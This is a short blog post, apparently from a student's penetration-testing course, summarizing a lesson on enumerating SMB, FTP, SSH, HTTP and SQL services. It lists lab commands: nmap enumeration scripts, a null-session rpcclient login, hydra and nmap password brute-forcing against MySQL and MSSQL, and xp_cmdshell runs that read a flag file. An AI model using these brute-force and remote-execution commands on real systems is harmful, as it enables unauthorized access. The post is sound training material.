Assessment Methodologies: Enumeration
This update has been a long time coming! It took a long time to get through this section, not because it’s intensive, it’s actually not at all, but because I had so much going on. Work has been really, really busy!
1.3 is broken into 5 protocols that I learned how to use enumeration on.
- SMB
- FTP
- SSH
- HTTP
- SQL
Some of the tools used a lot in this section were Metasploit, smbclient, smbmap, nmap scripts for smb.
Some of the cool commands that I got to run:
IPC null session – connect to it rpcclient -U “” -N IPADDR
nmap –script http-enum -sV -p 80 10.0.28.146
nmap –script http-headers -sV -p 80 10.0.28.146
nmap –script http-methods –script-args http-methods.url-path=/webdav/ 10.0.28.146
nmap –script http-webdav-scan –script-args http-methods.url-path=/webdav/ 10.0.28.146
nmap -sV -script banner 192.30.247.3
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.149.194.3 mysql
nmap -p 1433 –script ms-sql-ntlm-info –script-args mssql.instance-port=1433 10.0.30.33
nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-p asswords.txt 10.0.30.33
nmap -p 1433 –script ms-sql-empty-password 10.0.30.33
nmap -p 1433 –script ms-sql-query –script-args mssql.username=admin,mssql.password=password,ms-sql-query.query=”SELECT * FROM master..syslogins” 10.0.30.33 -oN output.txt gvim output.txt
: nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd=”ipconfig” 10.0.30.33
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd=”type c:\flag.txt” 10.0.30.33
I’ll add these to my tool bag for future use.
I believe this section is laying the groundwork for future lessons. Very basic and very light introductions into enumerating these protocols. On to section 1.4.

